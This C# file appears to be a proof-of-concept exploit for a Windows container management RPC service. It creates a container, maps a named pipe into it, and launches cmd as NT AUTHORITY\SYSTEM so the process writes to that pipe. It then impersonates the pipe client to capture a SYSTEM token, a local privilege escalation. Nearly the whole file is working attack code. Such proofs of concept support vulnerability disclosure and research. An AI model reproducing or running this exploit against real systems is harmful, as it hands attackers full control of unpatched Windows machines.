﻿using NtApiDotNet;
using NtApiDotNet.Ndr.Marshal;
using System;
using System.Text;
using System.Threading;
using System.Threading.Tasks;

namespace POC
{
    class Program
    {
        static void WaitForStatus(Client c, NdrContextHandle handle, int expected_state)
        {
            int retry_count = 120;

            Console.WriteLine("Expecting state {0}", expected_state);

            while (retry_count-- > 0)
            {
                int result = c.CmsRpcSrv_GetContainerState(handle, out NdrEnum16 state);
                if (result != 0)
                {
                    throw new ArgumentException($"Error getting state {result:X}.");
                }
                if (expected_state == state.Value)
                {
                    break;
                }
                Console.WriteLine("Current State: {0}", state.Value);
                Thread.Sleep(1000);
            }
        }

        static async Task<NtToken> GetPipeToken()
        {
            SecurityDescriptor sd = new SecurityDescriptor
            {
                Dacl = new Acl()
            };

            using (var obja = new ObjectAttributes(@"\??\pipe\dummypipe", AttributeFlags.CaseInsensitive,
                (NtObject)null, null, sd))
            {
                using (var pipe = NtFile.CreateNamedPipe(obja, FileAccessRights.GenericRead | FileAccessRights.GenericWrite,
                        FileShareMode.Read | FileShareMode.Write, FileOpenOptions.None, FileDisposition.OpenIf, 
                        NamedPipeType.Bytestream, NamedPipeReadMode.ByteStream,
                        NamedPipeCompletionMode.QueueOperation, 1, 0, 0, NtWaitTimeout.FromMilliseconds(50)))
                {
                    await pipe.ListenAsync();
                    var data = pipe.Read(16, null, false);
                    if (data.IsSuccess)
                    {
                        using (var imp = pipe.Impersonate())
                        {
                            return NtToken.OpenThreadToken(NtThread.Current, true, false);
                        }
                    }
                }
            }
            return null;
        }

        static void StartContainer()
        {
            using (var token = NtToken.OpenProcessToken(true))
            {
                Acl dacl = new Acl();
                dacl.AddAccessAllowedAce(GenericAccessRights.GenericAll, KnownSids.World);
                token.SetDefaultDacl(dacl);

                Client c = new Client();
                c.Connect();

                Guid guid = Guid.NewGuid();
                Console.WriteLine("Generating VM Guid: {0}", guid);
                Container_Config s1 = new Container_Config();
                s1.Owner = "Madrid";
                s1.Member8 = 4;
                s1.Member10 = new NdrUInt3264();

                Struct_3 s3 = new Struct_3();
                s3.Member0 = 1;
                s3.Member8 = new string[] { NtProcess.Current.User.ToString() };
                s1.Member18 = s3;

                s1.Member28 = 0x1000;
                s1.Member38 = new Struct_2();
                s1.Member40 = 3;
                s1.Member48 = token;

                int result = c.CmsRpcSrv_CreateContainer(guid, 5, s1, out Struct_7 s7, out NdrContextHandle container_handle);
                if (result != 0)
                {
                    throw new ArgumentException($"CreateContainer: {result}");
                }

                try
                {
                    result = c.CmsRpcSrv_EnableContainerNotifications(container_handle);
                    if (result != 0)
                    {
                        throw new ArgumentException($"EnableNotify: {result}");
                    }

                    // 5000, timeout?
                    result = c.CmsRpcSrv_CreateActivity(container_handle, 5000, out Struct_7 s7_2, out NdrContextHandle activity_handle);
                    if (result != 0)
                    {
                        throw new ArgumentException($"CreateActivity: {result}");
                    }

                    try
                    {
                        result = c.CmsRpcSrv_StartActivityAsync(activity_handle);
                        if (result != 0)
                        {
                            throw new ArgumentException($"Start: {result}");
                        }

                        WaitForStatus(c, container_handle, 4);

                        var pipe_token = GetPipeToken();

                        result = c.CmsRpcSrv_MapNamedPipeToContainer(activity_handle, @"\\.\pipe\dummypipe", "dummypipe");
                        if (result != 0)
                        {
                            throw new ArgumentException($"Start: {result}");
                        }

                        Struct_8 s8 = new Struct_8()
                        {
                            Member0 = @"cmd /C echo Hello > \\.\pipe\dummypipe",
                            Member10 = new Struct_9()
                            {
                                Member0 = @"NT AUTHORITY\SYSTEM"
                            }
                        };

                        result = c.CmsRpcSrv_CreateProcessInContainer(activity_handle, s8, s7_2, 7, out NtFile af, 
                            out NtFile bf, out NtFile cf, out int df, out NdrContextHandle process_handle);
                        if (result != 0)
                        {
                            throw new ArgumentException($"Start: {result}");
                        }

                        var data = bf.Read(256, null, false);
                        while (data.IsSuccess)
                        {
                            Console.Write(Encoding.ASCII.GetString(data.Result));
                            data = bf.Read(256, null, false);
                        }

                        c.CmsRpcSrv_CloseProcess(ref process_handle);

                        using (var result_token = pipe_token.GetAwaiter().GetResult())
                        {
                            if (result_token != null)
                            {
                                Console.WriteLine("Captured token for {0}", result_token.User.Name);
                            }
                            else
                            {
                                Console.WriteLine("Failed to capture a token.");
                            }
                        }
                    }
                    finally
                     
                    {
                         c.CmsRpcSrv_CloseActivity(ref activity_handle);
                    }
                }
                finally
                {
                    c.CmsRpcSrv_CloseContainer(ref container_handle);
                }
            }
        }

        static void Main()
        {
            try
            {
                StartContainer();
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
